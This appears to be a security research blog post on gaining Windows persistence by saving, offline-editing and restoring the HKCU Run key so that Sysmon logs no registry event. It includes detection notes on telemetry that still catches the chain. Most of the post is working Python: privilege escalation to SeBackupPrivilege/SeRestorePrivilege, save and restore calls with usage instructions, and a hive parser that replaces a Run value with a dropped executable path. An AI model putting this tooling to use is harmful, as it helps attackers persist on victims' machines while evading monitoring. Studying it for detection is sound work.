The Windows Registry is a fundamental component of the Windows operating system: it lets users and administrators tune system policies and low-level configuration settings. Those same capabilities make it a target for adversaries, who abuse this database to run and persist their tooling.
As the title says, this post walks through how I found a way to use the 'reg save' and 'reg restore' functionality to establish persistence while evading registry-based detection.
In this blog post I will cover the following subjects:
- How It Started: A Brief Overview
- Challenge
- Sysmon Registry Event Evasion
- Proof of Concept (POC) Development
- "reg save" and "reg restore" mechanism
- Parsing the Registry Backup File
- RegF Header
- HiveBin and Cell Record
- References
How It Started: A Brief Overview
Figure 1: registry saved hive modification
Figure 2: after reg restore
Challenge
From this test we can conclude that we have found a way to establish persistence using 'reg save' and 'reg restore'. The crucial next step is an automated way to modify the saved registry hive, so that the persistence entry lands in the registry Run key. The challenge, then, is working out how to parse the registry backup file.
Sysmon Registry Event Evasion
Figure 3: Registry callback function
Sysmon's driver registers a registry callback (figure 3) and only handles the following REG_NOTIFY_CLASS notifications:
- RegNtDeleteKey
- RegNtRenameKey
- RegNtPostCreateKey
- RegNtPostDeleteKey
- RegNtPostSetValueKey
Figure 4: REG_NOTIFY_CLASS filtering
RegRestoreKeyW() copies the saved hive over the target key as a whole rather than setting values one by one, so it raises the restore notification classes (RegNtPreRestoreKey / RegNtPostRestoreKey), which this filter ignores: a Run value written this way produces no Sysmon registry event (Event ID 12, 13 or 14). The rest of the chain stays visible, though: Sysmon can still log the process (Event ID 1) and the files it creates, such as the executable dropped into C:\Users\Public and the hive files themselves (Event ID 11), and enabling SeBackupPrivilege and SeRestorePrivilege is auditable under Sensitive Privilege Use.
Proof of Concept (POC) Development
Before getting into the use case of my proof of concept (POC), I first worked out how two components function under the hood.
"reg save" and "reg restore" Mechanism: my first goal was to understand how both commands work, so that I could reproduce them in my own code without invoking reg.exe.
Inspecting the code of reg.exe shows that the first step is adjusting the process token's privileges. For a save, it enables SeBackupPrivilege and then writes the hive with the RegSaveKeyExW() API; for a restore, it enables SeRestorePrivilege and then loads the backup file over the target key with the RegRestoreKeyW() API.
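The sequence above, reproduced as an added Python example (mine, not the POC from this post): enable the privilege on the process token with LookupPrivilegeValueW/AdjustTokenPrivileges, then call RegSaveKeyExW or RegRestoreKeyW through ctypes, the same way reg.exe does. It assumes an elevated prompt (the token must already hold SeBackupPrivilege/SeRestorePrivilege for AdjustTokenPrivileges to enable it), that the save target file does not exist yet, and the constant values are taken from the Win32 headers; RUN_KEY and the save/restore subcommand names are my own.

```python
import ctypes
import struct
import sys

SE_PRIVILEGE_ENABLED = 0x00000002
TOKEN_ADJUST_PRIVILEGES, TOKEN_QUERY = 0x0020, 0x0008
REG_LATEST_FORMAT = 2          # RegSaveKeyExW: write the current hive format (what reg save produces)
REG_FORCE_RESTORE = 0x0008     # RegRestoreKeyW: restore even if handles to the key or its subkeys are open
ERROR_NOT_ALL_ASSIGNED = 1300
RUN_KEY = r"Software\Microsoft\Windows\CurrentVersion\Run"   # relative to HKEY_CURRENT_USER (assumed target)


def build_token_privileges(luid: int, attributes: int = SE_PRIVILEGE_ENABLED) -> bytes:
    """TOKEN_PRIVILEGES with one entry: DWORD PrivilegeCount, LUID {LowPart, HighPart}, DWORD Attributes."""
    return struct.pack("<IIII", 1, luid & 0xFFFFFFFF, (luid >> 32) & 0xFFFFFFFF, attributes)


def enable_privilege(name: str) -> None:
    """The first thing reg.exe does: resolve the privilege LUID and enable it on the process token."""
    advapi32 = ctypes.WinDLL("advapi32", use_last_error=True)
    kernel32 = ctypes.WinDLL("kernel32", use_last_error=True)
    kernel32.GetCurrentProcess.restype = ctypes.c_void_p
    advapi32.OpenProcessToken.argtypes = [ctypes.c_void_p, ctypes.c_uint32, ctypes.POINTER(ctypes.c_void_p)]
    advapi32.LookupPrivilegeValueW.argtypes = [ctypes.c_wchar_p, ctypes.c_wchar_p, ctypes.POINTER(ctypes.c_uint64)]
    advapi32.AdjustTokenPrivileges.argtypes = [ctypes.c_void_p, ctypes.c_int, ctypes.c_char_p,
                                               ctypes.c_uint32, ctypes.c_void_p, ctypes.c_void_p]
    token, luid = ctypes.c_void_p(), ctypes.c_uint64()
    if not advapi32.OpenProcessToken(kernel32.GetCurrentProcess(),
                                     TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, ctypes.byref(token)):
        raise ctypes.WinError(ctypes.get_last_error())
    try:
        if not advapi32.LookupPrivilegeValueW(None, name, ctypes.byref(luid)):
            raise ctypes.WinError(ctypes.get_last_error())
        tp = build_token_privileges(luid.value)
        ok = advapi32.AdjustTokenPrivileges(token, 0, tp, len(tp), None, None)
        err = ctypes.get_last_error()
        # AdjustTokenPrivileges returns TRUE even if it enabled nothing; ERROR_NOT_ALL_ASSIGNED means the
        # token never held the privilege (not elevated, not a backup operator), so treat it as a failure.
        if not ok or err == ERROR_NOT_ALL_ASSIGNED:
            raise ctypes.WinError(err)
    finally:
        kernel32.CloseHandle(token)


def reg_save(subkey: str, path: str) -> None:
    """reg save HKCU\\<subkey> <path>: SeBackupPrivilege, then RegSaveKeyExW (the file must not exist yet)."""
    import winreg
    advapi32 = ctypes.WinDLL("advapi32", use_last_error=True)
    advapi32.RegSaveKeyExW.argtypes = [ctypes.c_void_p, ctypes.c_wchar_p, ctypes.c_void_p, ctypes.c_uint32]
    enable_privilege("SeBackupPrivilege")
    with winreg.OpenKey(winreg.HKEY_CURRENT_USER, subkey, 0, winreg.KEY_READ) as key:
        rc = advapi32.RegSaveKeyExW(key.handle, path, None, REG_LATEST_FORMAT)
    if rc != 0:
        raise ctypes.WinError(rc)


def reg_restore(subkey: str, path: str) -> None:
    """reg restore HKCU\\<subkey> <path>: SeRestorePrivilege, then RegRestoreKeyW copies the hive over the key."""
    import winreg
    advapi32 = ctypes.WinDLL("advapi32", use_last_error=True)
    advapi32.RegRestoreKeyW.argtypes = [ctypes.c_void_p, ctypes.c_wchar_p, ctypes.c_uint32]
    enable_privilege("SeRestorePrivilege")
    with winreg.OpenKey(winreg.HKEY_CURRENT_USER, subkey, 0, winreg.KEY_ALL_ACCESS) as key:
        rc = advapi32.RegRestoreKeyW(key.handle, path, REG_FORCE_RESTORE)
    if rc != 0:
        raise ctypes.WinError(rc)


if __name__ == "__main__":
    if sys.platform != "win32" or len(sys.argv) != 3 or sys.argv[1] not in ("save", "restore"):
        sys.exit("usage (Windows, elevated prompt): this_script.py save|restore <hive file>")
    (reg_save if sys.argv[1] == "save" else reg_restore)(RUN_KEY, sys.argv[2])
```

Run it as `python this_script.py save save_reg.hive`, edit the hive offline, then `python this_script.py restore mod_save_reg.hive`. The privilege step is the one people get wrong: AdjustTokenPrivileges reports success even when it could not enable anything, which is why the code checks GetLastError for ERROR_NOT_ALL_ASSIGNED instead of trusting the return value.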
Parsing the Registry Backup File: equally important was a reliable way to parse the backup file. Knowing its structure lets the code locate and rewrite the exact value it needs.
Figure 5: regf file header
Figure 6: cell record type
Figure 7: registry value data enumeration
- Adjust token privilege: enable SeBackupPrivilege so the HKCU\Software\Microsoft\Windows\CurrentVersion\Run key can be saved.
- Save the registry hive to "save_reg.hive".
- Parse the registry hive structure (save_reg.hive) to locate the registry value data string to be modified.
- Compute the length of that value data string during parsing, then use that length to generate a random file name.
- Drop a copy of itself in c:\users\public\{random_filename}.exe.
- Create a copy of save_reg.hive -> mod_save_reg.hive.
- Replace the current value data string of HKCU\Software\Microsoft\Windows\CurrentVersion\Run with the file path of the dropped copy.
- Adjust token privilege: enable SeRestorePrivilege.
- Trigger the restore via the RegRestoreKeyW() API.
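The parsing and patching steps of the list above, and the regf header, hive bin and cell record structures from the parsing section, as an added Python example (mine, not the POC from this post). It builds a constructed minimal hive standing in for save_reg.hive (one hbin holding a root nk for the Run key, its value list, one vk and its data cell), walks header -> root cell -> value list -> vk -> data, and overwrites the REG_SZ data in place with a random path of exactly the same length under C:\Users\Public, which is what lets the POC avoid moving any cells or offsets. The value name "Updater", the original path and the drop directory are made-up sample input; on Windows the returned bytes are what would be written to mod_save_reg.hive and handed to RegRestoreKeyW().

```python
import random
import string
import struct

HBIN_BASE = 0x1000   # cell offsets inside a regf file are relative to the first hive bin
REG_SZ = 1


def regf_checksum(hive: bytes) -> int:
    """XOR of the 127 DWORDs before the checksum field at 0x1FC (0 -> 1, 0xFFFFFFFF -> 0xFFFFFFFE)."""
    x = 0
    for (dword,) in struct.iter_unpack("<I", hive[:0x1FC]):
        x ^= dword
    return {0: 1, 0xFFFFFFFF: 0xFFFFFFFE}.get(x, x)


def checksum_ok(hive: bytes) -> bool:
    return struct.unpack_from("<I", hive, 0x1FC)[0] == regf_checksum(hive)


def _cell(payload: bytes) -> bytes:
    """Allocated cell: negative int32 size (including this field), rounded up to 8 bytes."""
    size = (4 + len(payload) + 7) & ~7
    return struct.pack("<i", -size) + payload.ljust(size - 4, b"\x00")


def build_hive(value_name: str, data: str, key_name: str = "Run") -> bytes:
    """Constructed sample hive standing in for save_reg.hive: root nk -> value list -> vk -> data cell."""
    raw = (data + "\x00").encode("utf-16-le")
    cells, off, pos = [], {}, 0x20                  # first cell follows the 32-byte hbin header

    def add(tag, payload):
        nonlocal pos
        cell = _cell(payload)
        off[tag], pos = pos, pos + len(cell)
        cells.append(cell)

    add("data", raw)
    add("vk", struct.pack("<2sHIIIHH", b"vk", len(value_name), len(raw), off["data"], REG_SZ, 1, 0)
        + value_name.encode("ascii"))               # flags=1: compressed (ASCII) value name
    add("vlist", struct.pack("<I", off["vk"]))      # value list: array of vk cell offsets
    add("nk", b"nk" + struct.pack("<H", 0x2C) + bytes(8)   # flags: hive entry | no delete | compressed name
        + struct.pack("<15I", 0, 0xFFFFFFFF, 0, 0, 0xFFFFFFFF, 0xFFFFFFFF, 1, off["vlist"],
                      0xFFFFFFFF, 0xFFFFFFFF, 0, 0, len(value_name), len(raw), 0)
        + struct.pack("<HH", len(key_name), 0) + key_name.encode("ascii"))
    body = b"".join(cells)
    hbin_size = (0x20 + len(body) + 0xFFF) & ~0xFFF
    hbin = (b"hbin" + struct.pack("<IIQQI", 0, hbin_size, 0, 0, 0) + body).ljust(hbin_size, b"\x00")
    hdr = bytearray(0x1000)
    hdr[:4] = b"regf"
    struct.pack_into("<II", hdr, 0x04, 1, 1)                        # primary / secondary sequence numbers
    struct.pack_into("<IIII", hdr, 0x14, 1, 5, 0, 1)                # major 1, minor 5, primary file, format 1
    struct.pack_into("<III", hdr, 0x24, off["nk"], hbin_size, 1)    # root cell offset, hbins size, clustering
    hdr[0x30:0x30 + 26] = "save_reg.hive".encode("utf-16-le")
    struct.pack_into("<I", hdr, 0x1FC, regf_checksum(hdr))
    return bytes(hdr) + hbin


def iter_values(hive: bytes):
    """Header -> root nk -> value list -> each vk. Yields (name, type, file offset of data, data length)."""
    if hive[:4] != b"regf" or hive[HBIN_BASE:HBIN_BASE + 4] != b"hbin":
        raise ValueError("not a regf hive")
    nk = HBIN_BASE + struct.unpack_from("<I", hive, 0x24)[0] + 4    # +4 skips the cell size field
    if hive[nk:nk + 2] != b"nk":
        raise ValueError("root cell is not an nk record")
    nvalues, vlist = struct.unpack_from("<II", hive, nk + 0x24)
    vlist += HBIN_BASE + 4
    for i in range(nvalues):
        vk = HBIN_BASE + struct.unpack_from("<I", hive, vlist + 4 * i)[0] + 4
        if hive[vk:vk + 2] != b"vk":
            raise ValueError("value list entry is not a vk record")
        name_len, size, data_off, vtype, flags = struct.unpack_from("<HIIIH", hive, vk + 2)
        name = hive[vk + 0x14:vk + 0x14 + name_len].decode("ascii" if flags & 1 else "utf-16-le")
        if size & 0x80000000:   # bit 31 set: data of <= 4 bytes is stored inline in the offset field
            yield name, vtype, vk + 8, size & 0x7FFFFFFF
        else:
            yield name, vtype, HBIN_BASE + data_off + 4, size


def run_values(hive: bytes) -> dict:
    """All REG_SZ values of the saved key, decoded."""
    return {n: hive[o:o + l].decode("utf-16-le").rstrip("\x00")
            for n, t, o, l in iter_values(hive) if t == REG_SZ}


def patch_value(hive: bytes, value_name: str, drop_dir: str = r"C:\Users\Public", rng=random):
    """Overwrite one REG_SZ value in place with an equally long '<drop_dir>\\<random>.exe' path."""
    for name, vtype, off, length in iter_values(hive):
        if name.lower() != value_name.lower():
            continue
        if vtype != REG_SZ:
            raise ValueError(f"{name} is not REG_SZ")
        old = hive[off:off + length].decode("utf-16-le").rstrip("\x00")
        stem_len = len(old) - len(drop_dir) - len("\\.exe")
        if stem_len < 1:
            raise ValueError("existing data is too short to hold the dropped file path")
        new = drop_dir + "\\" + "".join(rng.choices(string.ascii_lowercase, k=stem_len)) + ".exe"
        out = bytearray(hive)
        out[off:off + length] = new.encode("utf-16-le").ljust(length, b"\x00")  # same length: no cells move
        struct.pack_into("<I", out, 0x1FC, regf_checksum(out))   # covers the header only; needed if it changed
        return bytes(out), new
    raise KeyError(value_name)


if __name__ == "__main__":
    hive = build_hive("Updater", r"C:\Program Files\Vendor\updater.exe")
    print("before:", run_values(hive))
    patched, dropped = patch_value(hive, "Updater")
    print("after: ", run_values(patched), "| drop the copy at", dropped)
```

The walker assumes what reg save of a single key produces: the saved key is the root nk and its values hang off one value list. It does not descend into subkeys, follow "db" big-data records for values over 16 KB, or touch sk security cells, so a value whose data is shorter than the drop path (including one stored inline in the vk) is rejected rather than rewritten.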